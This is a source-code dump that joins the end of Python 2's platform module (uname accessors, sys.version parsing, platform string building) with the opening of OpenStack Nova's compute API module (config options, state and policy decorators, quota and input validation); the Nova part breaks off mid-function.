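#    '#1 SMP Fri Mar 6 11:36:42 UTC 2015', 'x86_64', 'x86_64')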
### Direct interfaces to some of the uname() return values
def system():
""" Returns the system/OS name, e.g. 'Linux', 'Windows' or 'Java'.
An empty string is returned if the value cannot be determined.
"""
return uname()[0]
def node():
""" Returns the computer's network name (which may not be fully
qualified)
An empty string is returned if the value cannot be determined.
"""
return uname()[1]
def release():
""" Returns the system's release, e.g. '2.2.0' or 'NT'
An empty string is returned if the value cannot be determined.
"""
return uname()[2]
def version():
""" Returns the system's release version, e.g. '#3 on degas'
An empty string is returned if the value cannot be determined.
"""
return uname()[3]
def machine():
""" Returns the machine type, e.g. 'i386'
An empty string is returned if the value cannot be determined.
"""
return uname()[4]
def processor():
""" Returns the (true) processor name, e.g. 'amdk6'
An empty string is returned if the value cannot be
determined. Note that many platforms do not provide this
information or simply return the same value as for machine(),
e.g. NetBSD does this.
"""
return uname()[5]
### Various APIs for extracting information from sys.version
_sys_version_parser = re.compile(
r'([\w.+]+)\s*' # "version<space>"
r'\(#?([^,]+)' # "(#buildno"
r'(?:,\s*([\w ]*)' # ", builddate"
r'(?:,\s*([\w :]*))?)?\)\s*' # ", buildtime)<space>"
r'\[([^\]]+)\]?') # "[compiler]"
_ironpython_sys_version_parser = re.compile(
r'IronPython\s*'
'([\d\.]+)'
'(?: \(([\d\.]+)\))?'
' on (.NET [\d\.]+)')
# IronPython covering 2.6 and 2.7
_ironpython26_sys_version_parser = re.compile(
r'([\d.]+)\s*'
'\(IronPython\s*'
'[\d.]+\s*'
'\(([\d.]+)\) on ([\w.]+ [\d.]+(?: \(\d+-bit\))?)\)'
)
_pypy_sys_version_parser = re.compile(
r'([\w.+]+)\s*'
'\(#?([^,]+),\s*([\w ]+),\s*([\w :]+)\)\s*'
'\[PyPy [^\]]+\]?')
_sys_version_cache = {}
def _sys_version(sys_version=None):
""" Returns a parsed version of Python's sys.version as tuple
(name, version, branch, revision, buildno, builddate, compiler)
referring to the Python implementation name, version, branch,
revision, build number, build date/time as string and the compiler
identification string.
Note that unlike the Python sys.version, the returned value
for the Python version will always include the patchlevel (it
defaults to '.0').
The function returns empty strings for tuple entries that
cannot be determined.
sys_version may be given to parse an alternative version
string, e.g. if the version was read from a different Python
interpreter.
"""
# Get the Python version
if sys_version is None:
sys_version = sys.version
# Try the cache first
result = _sys_version_cache.get(sys_version, None)
if result is not None:
return result
# Parse it
if 'IronPython' in sys_version:
# IronPython
name = 'IronPython'
if sys_version.startswith('IronPython'):
match = _ironpython_sys_version_parser.match(sys_version)
else:
match = _ironpython26_sys_version_parser.match(sys_version)
if match is None:
raise ValueError(
'failed to parse IronPython sys.version: %s' %
repr(sys_version))
version, alt_version, compiler = match.groups()
buildno = ''
builddate = ''
elif sys.platform.startswith('java'):
# Jython
name = 'Jython'
match = _sys_version_parser.match(sys_version)
if match is None:
raise ValueError(
'failed to parse Jython sys.version: %s' %
repr(sys_version))
version, buildno, builddate, buildtime, _ = match.groups()
if builddate is None:
builddate = ''
compiler = sys.platform
elif "PyPy" in sys_version:
# PyPy
name = "PyPy"
match = _pypy_sys_version_parser.match(sys_version)
if match is None:
raise ValueError("failed to parse PyPy sys.version: %s" %
repr(sys_version))
version, buildno, builddate, buildtime = match.groups()
compiler = ""
else:
# CPython
match = _sys_version_parser.match(sys_version)
if match is None:
raise ValueError(
'failed to parse CPython sys.version: %s' %
repr(sys_version))
version, buildno, builddate, buildtime, compiler = \
match.groups()
name = 'CPython'
if builddate is None:
builddate = ''
elif buildtime:
builddate = builddate + ' ' + buildtime
if hasattr(sys, 'subversion'):
# sys.subversion was added in Python 2.5
_, branch, revision = sys.subversion
else:
branch = ''
revision = ''
# Add the patchlevel version if missing
l = string.split(version, '.')
if len(l) == 2:
l.append('0')
version = string.join(l, '.')
# Build and cache the result
result = (name, version, branch, revision, buildno, builddate, compiler)
_sys_version_cache[sys_version] = result
return result
def python_implementation():
""" Returns a string identifying the Python implementation.
Currently, the following implementations are identified:
'CPython' (C implementation of Python),
'IronPython' (.NET implementation of Python),
'Jython' (Java implementation of Python),
'PyPy' (Python implementation of Python).
"""
return _sys_version()[0]
def python_version():
""" Returns the Python version as string 'major.minor.patchlevel'
Note that unlike the Python sys.version, the returned value
will always include the patchlevel (it defaults to 0).
"""
return _sys_version()[1]
def python_version_tuple():
""" Returns the Python version as tuple (major, minor, patchlevel)
of strings.
Note that unlike the Python sys.version, the returned value
will always include the patchlevel (it defaults to 0).
"""
return tuple(string.split(_sys_version()[1], '.'))
def python_branch():
""" Returns a string identifying the Python implementation
branch.
For CPython this is the Subversion branch from which the
Python binary was built.
If not available, an empty string is returned.
"""
return _sys_version()[2]
def python_revision():
""" Returns a string identifying the Python implementation
revision.
For CPython this is the Subversion revision from which the
Python binary was built.
If not available, an empty string is returned.
"""
return _sys_version()[3]
def python_build():
""" Returns a tuple (buildno, builddate) stating the Python
build number and date as strings.
"""
return _sys_version()[4:6]
def python_compiler():
""" Returns a string identifying the compiler used for compiling
Python.
"""
return _sys_version()[6]
### The Opus Magnum of platform strings :-)
_platform_cache = {}
def platform(aliased=0, terse=0):
""" Returns a single string identifying the underlying platform
with as much useful information as possible (but no more :).
The output is intended to be human readable rather than
machine parseable. It may look different on different
platforms and this is intended.
If "aliased" is true, the function will use aliases for
various platforms that report system names which differ from
their common names, e.g. SunOS will be reported as
Solaris. The system_alias() function is used to implement
this.
Setting terse to true causes the function to return only the
absolute minimum information needed to identify the platform.
"""
result = _platform_cache.get((aliased, terse), None)
if result is not None:
return result
# Get uname information and then apply platform specific cosmetics
# to it...
system,node,release,version,machine,processor = uname()
if machine == processor:
processor = ''
if aliased:
system,release,version = system_alias(system,release,version)
if system == 'Windows':
# MS platforms
rel,vers,csd,ptype = win32_ver(version)
if terse:
platform = _platform(system,release)
else:
platform = _platform(system,release,version,csd)
elif system in ('Linux',):
# Linux based systems
distname,distversion,distid = dist('')
if distname and not terse:
platform = _platform(system,release,machine,processor,
'with',
distname,distversion,distid)
else:
# If the distribution name is unknown check for libc vs. glibc
libcname,libcversion = libc_ver(sys.executable)
platform = _platform(system,release,machine,processor,
'with',
libcname+libcversion)
elif system == 'Java':
# Java platforms
r,v,vminfo,(os_name,os_version,os_arch) = java_ver()
if terse or not os_name:
platform = _platform(system,release,version)
else:
platform = _platform(system,release,version,
'on',
os_name,os_version,os_arch)
elif system == 'MacOS':
# MacOS platforms
if terse:
platform = _platform(system,release)
else:
platform = _platform(system,release,machine)
else:
# Generic handler
if terse:
platform = _platform(system,release)
else:
bits,linkage = architecture(sys.executable)
platform = _platform(system,release,machine,processor,bits,linkage)
_platform_cache[(aliased, terse)] = platform
return platform
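# Illustrative examples (intentionally platform dependent; the strings are only
# an assumption of typical output on a Linux host):
#
#   >>> platform()    # doctest: +SKIP
#   'Linux-3.10.0-229.el7.x86_64-x86_64-with-centos-7.1.1503-Core'
#   >>> platform(terse=True)    # doctest: +SKIP
#   'Linux-3.10.0-229.el7.x86_64'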
### Command line interface
if __name__ == '__main__':
# Default is to print the aliased verbose platform string
terse = ('terse' in sys.argv or '--terse' in sys.argv)
aliased = (not 'nonaliased' in sys.argv and not '--nonaliased' in sys.argv)
print platform(aliased,terse)
sys.exit(0)
| mit | -3,123,977,640,802,781,000 | 30.921459 | 82 | 0.56988 | false |
berrange/nova | nova/compute/api.py | 1 | 179341 | # Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Piston Cloud Computing, Inc.
# Copyright 2012-2013 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Handles all requests relating to compute resources (e.g. guest VMs,
networking and storage of VMs, and compute hosts on which they run)."""
import base64
import functools
import re
import string
import uuid
from oslo.config import cfg
import six
from nova import availability_zones
from nova import block_device
from nova.cells import opts as cells_opts
from nova.compute import flavors
from nova.compute import instance_actions
from nova.compute import power_state
from nova.compute import rpcapi as compute_rpcapi
from nova.compute import task_states
from nova.compute import utils as compute_utils
from nova.compute import vm_states
from nova.consoleauth import rpcapi as consoleauth_rpcapi
from nova import crypto
from nova.db import base
from nova import exception
from nova import hooks
from nova.i18n import _
from nova.i18n import _LE
from nova import image
from nova import keymgr
from nova import network
from nova.network import model as network_model
from nova.network.security_group import openstack_driver
from nova.network.security_group import security_group_base
from nova import notifications
from nova import objects
from nova.objects import base as obj_base
from nova.objects import quotas as quotas_obj
from nova.objects import security_group as security_group_obj
from nova.openstack.common import excutils
from nova.openstack.common import jsonutils
from nova.openstack.common import log as logging
from nova.openstack.common import strutils
from nova.openstack.common import timeutils
from nova.openstack.common import uuidutils
from nova.pci import pci_request
import nova.policy
from nova import quota
from nova import rpc
from nova import servicegroup
from nova import utils
from nova.virt import hardware
from nova import volume
LOG = logging.getLogger(__name__)
get_notifier = functools.partial(rpc.get_notifier, service='compute')
wrap_exception = functools.partial(exception.wrap_exception,
get_notifier=get_notifier)
compute_opts = [
cfg.BoolOpt('allow_resize_to_same_host',
default=False,
help='Allow destination machine to match source for resize. '
'Useful when testing in single-host environments.'),
cfg.BoolOpt('allow_migrate_to_same_host',
default=False,
help='Allow migrate machine to the same host. '
'Useful when testing in single-host environments.'),
cfg.StrOpt('default_schedule_zone',
help='Availability zone to use when user doesn\'t specify one'),
cfg.ListOpt('non_inheritable_image_properties',
default=['cache_in_nova',
'bittorrent'],
help='These are image properties which a snapshot should not'
' inherit from an instance'),
cfg.StrOpt('null_kernel',
default='nokernel',
help='Kernel image that indicates not to use a kernel, but to '
'use a raw disk image instead'),
cfg.StrOpt('multi_instance_display_name_template',
default='%(name)s-%(uuid)s',
help='When creating multiple instances with a single request '
'using the os-multiple-create API extension, this '
'template will be used to build the display name for '
'each instance. The benefit is that the instances '
'end up with different hostnames. To restore legacy '
'behavior of every instance having the same name, set '
'this option to "%(name)s". Valid keys for the '
'template are: name, uuid, count.'),
cfg.IntOpt('max_local_block_devices',
default=3,
help='Maximum number of devices that will result '
'in a local image being created on the hypervisor node. '
'Setting this to 0 means nova will allow only '
'boot from volume. A negative number means unlimited.'),
]
ephemeral_storage_encryption_group = cfg.OptGroup(
name='ephemeral_storage_encryption',
title='Ephemeral storage encryption options')
ephemeral_storage_encryption_opts = [
cfg.BoolOpt('enabled',
default=False,
help='Whether to encrypt ephemeral storage'),
cfg.StrOpt('cipher',
default='aes-xts-plain64',
help='The cipher and mode to be used to encrypt ephemeral '
'storage. Which ciphers are available ciphers depends '
'on kernel support. See /proc/crypto for the list of '
'available options.'),
cfg.IntOpt('key_size',
default=512,
help='The bit length of the encryption key to be used to '
'encrypt ephemeral storage (in XTS mode only half of '
'the bits are used for encryption key)')
]
CONF = cfg.CONF
CONF.register_opts(compute_opts)
CONF.register_group(ephemeral_storage_encryption_group)
CONF.register_opts(ephemeral_storage_encryption_opts,
group='ephemeral_storage_encryption')
CONF.import_opt('compute_topic', 'nova.compute.rpcapi')
CONF.import_opt('enable', 'nova.cells.opts', group='cells')
CONF.import_opt('default_ephemeral_format', 'nova.virt.driver')
MAX_USERDATA_SIZE = 65535
QUOTAS = quota.QUOTAS
RO_SECURITY_GROUPS = ['default']
VIDEO_RAM = 'hw_video:ram_max_mb'
def check_instance_state(vm_state=None, task_state=(None,),
must_have_launched=True):
"""Decorator to check VM and/or task state before entry to API functions.
If the instance is in the wrong state, or has not been successfully
    started at least once, the wrapper will raise an exception.
"""
if vm_state is not None and not isinstance(vm_state, set):
vm_state = set(vm_state)
if task_state is not None and not isinstance(task_state, set):
task_state = set(task_state)
def outer(f):
@functools.wraps(f)
def inner(self, context, instance, *args, **kw):
if vm_state is not None and instance['vm_state'] not in vm_state:
raise exception.InstanceInvalidState(
attr='vm_state',
instance_uuid=instance['uuid'],
state=instance['vm_state'],
method=f.__name__)
if (task_state is not None and
instance['task_state'] not in task_state):
raise exception.InstanceInvalidState(
attr='task_state',
instance_uuid=instance['uuid'],
state=instance['task_state'],
method=f.__name__)
if must_have_launched and not instance['launched_at']:
raise exception.InstanceInvalidState(
attr=None,
not_launched=True,
instance_uuid=instance['uuid'],
state=instance['vm_state'],
method=f.__name__)
return f(self, context, instance, *args, **kw)
return inner
return outer
def check_instance_host(function):
@functools.wraps(function)
def wrapped(self, context, instance, *args, **kwargs):
if not instance['host']:
raise exception.InstanceNotReady(instance_id=instance['uuid'])
return function(self, context, instance, *args, **kwargs)
return wrapped
def check_instance_lock(function):
@functools.wraps(function)
def inner(self, context, instance, *args, **kwargs):
if instance['locked'] and not context.is_admin:
raise exception.InstanceIsLocked(instance_uuid=instance['uuid'])
return function(self, context, instance, *args, **kwargs)
return inner
def policy_decorator(scope):
"""Check corresponding policy prior of wrapped method to execution."""
def outer(func):
@functools.wraps(func)
def wrapped(self, context, target, *args, **kwargs):
check_policy(context, func.__name__, target, scope)
return func(self, context, target, *args, **kwargs)
return wrapped
return outer
wrap_check_policy = policy_decorator(scope='compute')
wrap_check_security_groups_policy = policy_decorator(
scope='compute:security_groups')
def check_policy(context, action, target, scope='compute'):
_action = '%s:%s' % (scope, action)
nova.policy.enforce(context, _action, target)
def check_instance_cell(fn):
def _wrapped(self, context, instance, *args, **kwargs):
self._validate_cell(instance, fn.__name__)
return fn(self, context, instance, *args, **kwargs)
_wrapped.__name__ = fn.__name__
return _wrapped
def _diff_dict(orig, new):
"""Return a dict describing how to change orig to new. The keys
correspond to values that have changed; the value will be a list
of one or two elements. The first element of the list will be
either '+' or '-', indicating whether the key was updated or
deleted; if the key was updated, the list will contain a second
element, giving the updated value.
"""
# Figure out what keys went away
result = dict((k, ['-']) for k in set(orig.keys()) - set(new.keys()))
# Compute the updates
for key, value in new.items():
if key not in orig or value != orig[key]:
result[key] = ['+', value]
return result
class API(base.Base):
"""API for interacting with the compute manager."""
def __init__(self, image_api=None, network_api=None, volume_api=None,
security_group_api=None, **kwargs):
self.image_api = image_api or image.API()
self.network_api = network_api or network.API()
self.volume_api = volume_api or volume.API()
self.security_group_api = (security_group_api or
openstack_driver.get_openstack_security_group_driver())
self.consoleauth_rpcapi = consoleauth_rpcapi.ConsoleAuthAPI()
self.compute_rpcapi = compute_rpcapi.ComputeAPI()
self._compute_task_api = None
self.servicegroup_api = servicegroup.API()
self.notifier = rpc.get_notifier('compute', CONF.host)
if CONF.ephemeral_storage_encryption.enabled:
self.key_manager = keymgr.API()
super(API, self).__init__(**kwargs)
@property
def compute_task_api(self):
if self._compute_task_api is None:
# TODO(alaski): Remove calls into here from conductor manager so
# that this isn't necessary. #1180540
from nova import conductor
self._compute_task_api = conductor.ComputeTaskAPI()
return self._compute_task_api
@property
def cell_type(self):
try:
return getattr(self, '_cell_type')
except AttributeError:
self._cell_type = cells_opts.get_cell_type()
return self._cell_type
def _cell_read_only(self, cell_name):
"""Is the target cell in a read-only mode?"""
# FIXME(comstud): Add support for this.
return False
def _validate_cell(self, instance, method):
if self.cell_type != 'api':
return
cell_name = instance['cell_name']
if not cell_name:
raise exception.InstanceUnknownCell(
instance_uuid=instance['uuid'])
if self._cell_read_only(cell_name):
raise exception.InstanceInvalidState(
attr="vm_state",
instance_uuid=instance['uuid'],
state="temporary_readonly",
method=method)
def _record_action_start(self, context, instance, action):
objects.InstanceAction.action_start(context, instance['uuid'],
action, want_result=False)
def _check_injected_file_quota(self, context, injected_files):
"""Enforce quota limits on injected files.
Raises a QuotaError if any limit is exceeded.
"""
if injected_files is None:
return
# Check number of files first
try:
QUOTAS.limit_check(context, injected_files=len(injected_files))
except exception.OverQuota:
raise exception.OnsetFileLimitExceeded()
# OK, now count path and content lengths; we're looking for
# the max...
max_path = 0
max_content = 0
for path, content in injected_files:
max_path = max(max_path, len(path))
max_content = max(max_content, len(content))
try:
QUOTAS.limit_check(context, injected_file_path_bytes=max_path,
injected_file_content_bytes=max_content)
except exception.OverQuota as exc:
# Favor path limit over content limit for reporting
# purposes
if 'injected_file_path_bytes' in exc.kwargs['overs']:
raise exception.OnsetFilePathLimitExceeded()
else:
raise exception.OnsetFileContentLimitExceeded()
def _check_num_instances_quota(self, context, instance_type, min_count,
max_count):
"""Enforce quota limits on number of instances created."""
# Determine requested cores and ram
req_cores = max_count * instance_type['vcpus']
vram_mb = int(instance_type.get('extra_specs', {}).get(VIDEO_RAM, 0))
req_ram = max_count * (instance_type['memory_mb'] + vram_mb)
# Check the quota
try:
quotas = objects.Quotas(context)
quotas.reserve(context, instances=max_count,
cores=req_cores, ram=req_ram)
except exception.OverQuota as exc:
# OK, we exceeded quota; let's figure out why...
quotas = exc.kwargs['quotas']
overs = exc.kwargs['overs']
headroom = exc.kwargs['headroom']
allowed = headroom['instances']
# Reduce 'allowed' instances in line with the cores & ram headroom
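            # For example (illustrative): with 8 cores of headroom and a
            # 4-vcpu flavor, at most 2 more instances are allowed.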
if instance_type['vcpus']:
allowed = min(allowed,
headroom['cores'] // instance_type['vcpus'])
if instance_type['memory_mb']:
allowed = min(allowed,
headroom['ram'] // (instance_type['memory_mb'] +
vram_mb))
# Convert to the appropriate exception message
if allowed <= 0:
msg = _("Cannot run any more instances of this type.")
allowed = 0
elif min_count <= allowed <= max_count:
# We're actually OK, but still need reservations
return self._check_num_instances_quota(context, instance_type,
min_count, allowed)
else:
msg = (_("Can only run %s more instances of this type.") %
allowed)
resource = overs[0]
used = quotas[resource] - headroom[resource]
total_allowed = quotas[resource]
overs = ','.join(overs)
params = {'overs': overs, 'pid': context.project_id,
'min_count': min_count, 'max_count': max_count,
'msg': msg}
if min_count == max_count:
LOG.warn(_("%(overs)s quota exceeded for %(pid)s,"
" tried to run %(min_count)d instances. %(msg)s"),
params)
else:
LOG.warn(_("%(overs)s quota exceeded for %(pid)s,"
" tried to run between %(min_count)d and"
" %(max_count)d instances. %(msg)s"),
params)
num_instances = (str(min_count) if min_count == max_count else
"%s-%s" % (min_count, max_count))
requested = dict(instances=num_instances, cores=req_cores,
ram=req_ram)
raise exception.TooManyInstances(overs=overs,
req=requested[resource],
used=used, allowed=total_allowed,
resource=resource)
return max_count, quotas
def _check_metadata_properties_quota(self, context, metadata=None):
"""Enforce quota limits on metadata properties."""
if not metadata:
metadata = {}
if not isinstance(metadata, dict):
msg = (_("Metadata type should be dict."))
raise exception.InvalidMetadata(reason=msg)
num_metadata = len(metadata)
try:
QUOTAS.limit_check(context, metadata_items=num_metadata)
except exception.OverQuota as exc:
quota_metadata = exc.kwargs['quotas']['metadata_items']
raise exception.MetadataLimitExceeded(allowed=quota_metadata)
# Because metadata is stored in the DB, we hard-code the size limits
# In future, we may support more variable length strings, so we act
# as if this is quota-controlled for forwards compatibility
for k, v in metadata.iteritems():
try:
utils.check_string_length(v)
utils.check_string_length(k, min_length=1)
except exception.InvalidInput as e:
raise exception.InvalidMetadata(reason=e.format_message())
# For backward compatible we need raise HTTPRequestEntityTooLarge
# so we need to keep InvalidMetadataSize exception here
if len(k) > 255:
msg = _("Metadata property key greater than 255 characters")
raise exception.InvalidMetadataSize(reason=msg)
if len(v) > 255:
msg = _("Metadata property value greater than 255 characters")
raise exception.InvalidMetadataSize(reason=msg)
def _check_requested_secgroups(self, context, secgroups):
"""Check if the security group requested exists and belongs to
the project.
"""
for secgroup in secgroups:
# NOTE(sdague): default is handled special
if secgroup == "default":
continue
if not self.security_group_api.get(context, secgroup):
raise exception.SecurityGroupNotFoundForProject(
project_id=context.project_id, security_group_id=secgroup)
def _check_requested_networks(self, context, requested_networks,
max_count):
"""Check if the networks requested belongs to the project
and the fixed IP address for each network provided is within
same the network block
"""
if requested_networks is not None:
# NOTE(danms): Temporary transition
requested_networks = requested_networks.as_tuples()
return self.network_api.validate_networks(context, requested_networks,
max_count)
def _handle_kernel_and_ramdisk(self, context, kernel_id, ramdisk_id,
image):
"""Choose kernel and ramdisk appropriate for the instance.
The kernel and ramdisk can be chosen in one of three ways:
1. Passed in with create-instance request.
2. Inherited from image.
3. Forced to None by using `null_kernel` FLAG.
"""
# Inherit from image if not specified
image_properties = image.get('properties', {})
if kernel_id is None:
kernel_id = image_properties.get('kernel_id')
if ramdisk_id is None:
ramdisk_id = image_properties.get('ramdisk_id')
# Force to None if using null_kernel
if kernel_id == str(CONF.null_kernel):
kernel_id = None
ramdisk_id = None
# Verify kernel and ramdisk exist (fail-fast)
if kernel_id is not None:
kernel_image = self.image_api.get(context, kernel_id)
# kernel_id could have been a URI, not a UUID, so to keep behaviour
# from before, which leaked that implementation detail out to the
# caller, we return the image UUID of the kernel image and ramdisk
# image (below) and not any image URIs that might have been
# supplied.
# TODO(jaypipes): Get rid of this silliness once we move to a real
# Image object and hide all of that stuff within nova.image.api.
kernel_id = kernel_image['id']
if ramdisk_id is not None:
ramdisk_image = self.image_api.get(context, ramdisk_id)
ramdisk_id = ramdisk_image['id']
return kernel_id, ramdisk_id
@staticmethod
def _handle_availability_zone(context, availability_zone):
# NOTE(vish): We have a legacy hack to allow admins to specify hosts
# via az using az:host:node. It might be nice to expose an
# api to specify specific hosts to force onto, but for
# now it just supports this legacy hack.
# NOTE(deva): It is also possible to specify az::node, in which case
# the host manager will determine the correct host.
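        # For example: "az1:host1" yields ("az1", "host1", None), while
        # "az1::node1" yields ("az1", None, "node1").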
forced_host = None
forced_node = None
if availability_zone and ':' in availability_zone:
c = availability_zone.count(':')
if c == 1:
availability_zone, forced_host = availability_zone.split(':')
elif c == 2:
if '::' in availability_zone:
availability_zone, forced_node = \
availability_zone.split('::')
else:
availability_zone, forced_host, forced_node = \
availability_zone.split(':')
else:
raise exception.InvalidInput(
reason="Unable to parse availability_zone")
if not availability_zone:
availability_zone = CONF.default_schedule_zone
if forced_host:
check_policy(context, 'create:forced_host', {})
if forced_node:
check_policy(context, 'create:forced_host', {})
return availability_zone, forced_host, forced_node
def _ensure_auto_disk_config_is_valid(self, auto_disk_config_img,
auto_disk_config, image):
auto_disk_config_disabled = \
utils.is_auto_disk_config_disabled(auto_disk_config_img)
if auto_disk_config_disabled and auto_disk_config:
raise exception.AutoDiskConfigDisabledByImage(image=image)
def _inherit_properties_from_image(self, image, auto_disk_config):
image_properties = image.get('properties', {})
auto_disk_config_img = \
utils.get_auto_disk_config_from_image_props(image_properties)
self._ensure_auto_disk_config_is_valid(auto_disk_config_img,
auto_disk_config,
image.get("id"))
if auto_disk_config is None:
auto_disk_config = strutils.bool_from_string(auto_disk_config_img)
return {
'os_type': image_properties.get('os_type'),
'architecture': image_properties.get('architecture'),
'vm_mode': image_properties.get('vm_mode'),
'auto_disk_config': auto_disk_config
}
def _apply_instance_name_template(self, context, instance, index):
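        # With the default template '%(name)s-%(uuid)s', an instance named
        # 'web' ends up with a display name like 'web-<uuid>' (illustrative).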
params = {
'uuid': instance['uuid'],
'name': instance['display_name'],
'count': index + 1,
}
try:
new_name = (CONF.multi_instance_display_name_template %
params)
except (KeyError, TypeError):
LOG.exception(_LE('Failed to set instance name using '
'multi_instance_display_name_template.'))
new_name = instance['display_name']
instance.display_name = new_name
if not instance.get('hostname', None):
instance.hostname = utils.sanitize_hostname(new_name)
instance.save()
return instance
def _check_config_drive(self, config_drive):
if config_drive:
try:
bool_val = strutils.bool_from_string(config_drive,
strict=True)
except ValueError:
raise exception.ConfigDriveInvalidValue(option=config_drive)
else:
bool_val = False
# FIXME(comstud): Bug ID 1193438 filed for this. This looks silly,
# but this is because the config drive column is a String. False
# is represented by using an empty string. And for whatever
# reason, we rely on the DB to cast True to a String.
return True if bool_val else ''
def _check_requested_image(self, context, image_id, image, instance_type):
if not image:
return
if image['status'] != 'active':
raise exception.ImageNotActive(image_id=image_id)
image_properties = image.get('properties', {})
config_drive_option = image_properties.get(
'img_config_drive', 'optional')
if config_drive_option not in ['optional', 'mandatory']:
raise exception.InvalidImageConfigDrive(
config_drive=config_drive_option)
if instance_type['memory_mb'] < int(image.get('min_ram') or 0):
raise exception.FlavorMemoryTooSmall()
# NOTE(johannes): root_gb is allowed to be 0 for legacy reasons
# since libvirt interpreted the value differently than other
# drivers. A value of 0 means don't check size.
root_gb = instance_type['root_gb']
if root_gb:
if int(image.get('size') or 0) > root_gb * (1024 ** 3):
raise exception.FlavorDiskTooSmall()
if int(image.get('min_disk') or 0) > root_gb:
raise exception.FlavorDiskTooSmall()
def _get_image_defined_bdms(self, base_options, instance_type, image_meta,
root_device_name):
image_properties = image_meta.get('properties', {})
# Get the block device mappings defined by the image.
image_defined_bdms = image_properties.get('block_device_mapping', [])
legacy_image_defined = not image_properties.get('bdm_v2', False)
image_mapping = image_properties.get('mappings', [])
if legacy_image_defined:
image_defined_bdms = block_device.from_legacy_mapping(
image_defined_bdms, None, root_device_name)
else:
image_defined_bdms = map(block_device.BlockDeviceDict,
image_defined_bdms)
if image_mapping:
image_defined_bdms += self._prepare_image_mapping(
instance_type, image_mapping)
return image_defined_bdms
def _check_and_transform_bdm(self, base_options, instance_type, image_meta,
min_count, max_count, block_device_mapping,
legacy_bdm):
# NOTE (ndipanov): Assume root dev name is 'vda' if not supplied.
# It's needed for legacy conversion to work.
root_device_name = (base_options.get('root_device_name') or 'vda')
image_ref = base_options.get('image_ref', '')
image_defined_bdms = self._get_image_defined_bdms(
base_options, instance_type, image_meta, root_device_name)
root_in_image_bdms = (
block_device.get_root_bdm(image_defined_bdms) is not None)
if legacy_bdm:
block_device_mapping = block_device.from_legacy_mapping(
block_device_mapping, image_ref, root_device_name,
no_root=root_in_image_bdms)
elif image_ref and root_in_image_bdms:
# NOTE (ndipanov): client will insert an image mapping into the v2
# block_device_mapping, but if there is a bootable device in image
# mappings - we need to get rid of the inserted image.
def not_image_and_root_bdm(bdm):
return not (bdm.get('boot_index') == 0 and
bdm.get('source_type') == 'image')
block_device_mapping = (
filter(not_image_and_root_bdm, block_device_mapping))
block_device_mapping += image_defined_bdms
if min_count > 1 or max_count > 1:
if any(map(lambda bdm: bdm['source_type'] == 'volume',
block_device_mapping)):
msg = _('Cannot attach one or more volumes to multiple'
' instances')
raise exception.InvalidRequest(msg)
return block_device_mapping
def _get_image(self, context, image_href):
if not image_href:
return None, {}
image = self.image_api.get(context, image_href)
return image['id'], image
def _checks_for_create_and_rebuild(self, context, image_id, image,
instance_type, metadata,
files_to_inject):
self._check_metadata_properties_quota(context, metadata)
self._check_injected_file_quota(context, files_to_inject)
self._check_requested_image(context, image_id, image, instance_type)
def _validate_and_build_base_options(self, context, instance_type,
boot_meta, image_href, image_id,
kernel_id, ramdisk_id, display_name,
display_description, key_name,
key_data, security_groups,
availability_zone, forced_host,
user_data, metadata, injected_files,
access_ip_v4, access_ip_v6,
requested_networks, config_drive,
block_device_mapping,
auto_disk_config, reservation_id,
max_count):
"""Verify all the input parameters regardless of the provisioning
strategy being performed.
"""
if availability_zone:
available_zones = availability_zones.\
get_availability_zones(context.elevated(), True)
if forced_host is None and availability_zone not in \
available_zones:
msg = _('The requested availability zone is not available')
raise exception.InvalidRequest(msg)
if instance_type['disabled']:
raise exception.FlavorNotFound(flavor_id=instance_type['id'])
if user_data:
l = len(user_data)
if l > MAX_USERDATA_SIZE:
# NOTE(mikal): user_data is stored in a text column, and
                # the database might silently truncate if it's over length.
raise exception.InstanceUserDataTooLarge(
length=l, maxsize=MAX_USERDATA_SIZE)
try:
base64.decodestring(user_data)
except base64.binascii.Error:
raise exception.InstanceUserDataMalformed()
self._checks_for_create_and_rebuild(context, image_id, boot_meta,
instance_type, metadata, injected_files)
self._check_requested_secgroups(context, security_groups)
# Note: max_count is the number of instances requested by the user,
# max_network_count is the maximum number of instances taking into
# account any network quotas
max_network_count = self._check_requested_networks(context,
requested_networks, max_count)
kernel_id, ramdisk_id = self._handle_kernel_and_ramdisk(
context, kernel_id, ramdisk_id, boot_meta)
config_drive = self._check_config_drive(config_drive)
if key_data is None and key_name:
key_pair = objects.KeyPair.get_by_name(context,
context.user_id,
key_name)
key_data = key_pair.public_key
root_device_name = block_device.prepend_dev(
block_device.properties_root_device_name(
boot_meta.get('properties', {})))
numa_topology = hardware.VirtNUMAInstanceTopology.get_constraints(
instance_type, boot_meta.get('properties', {}))
if numa_topology is not None:
numa_topology = objects.InstanceNUMATopology.obj_from_topology(
numa_topology)
system_metadata = flavors.save_flavor_info(
dict(), instance_type)
# PCI requests come from two sources: instance flavor and
# requested_networks. The first call in below returns an
# InstancePCIRequests object which is a list of InstancePCIRequest
# objects. The second call in below creates an InstancePCIRequest
# object for each SR-IOV port, and append it to the list in the
# InstancePCIRequests object
pci_request_info = pci_request.get_pci_requests_from_flavor(
instance_type)
self.network_api.create_pci_requests_for_sriov_ports(context,
pci_request_info, requested_networks)
base_options = {
'reservation_id': reservation_id,
'image_ref': image_href,
'kernel_id': kernel_id or '',
'ramdisk_id': ramdisk_id or '',
'power_state': power_state.NOSTATE,
'vm_state': vm_states.BUILDING,
'config_drive': config_drive,
'user_id': context.user_id,
'project_id': context.project_id,
'instance_type_id': instance_type['id'],
'memory_mb': instance_type['memory_mb'],
'vcpus': instance_type['vcpus'],
'root_gb': instance_type['root_gb'],
'ephemeral_gb': instance_type['ephemeral_gb'],
'display_name': display_name,
'display_description': display_description or '',
'user_data': user_data,
'key_name': key_name,
'key_data': key_data,
'locked': False,
'metadata': metadata or {},
'access_ip_v4': access_ip_v4,
'access_ip_v6': access_ip_v6,
'availability_zone': availability_zone,
'root_device_name': root_device_name,
'progress': 0,
'pci_request_info': pci_request_info,
'numa_topology': numa_topology,
'system_metadata': system_metadata}
options_from_image = self._inherit_properties_from_image(
boot_meta, auto_disk_config)
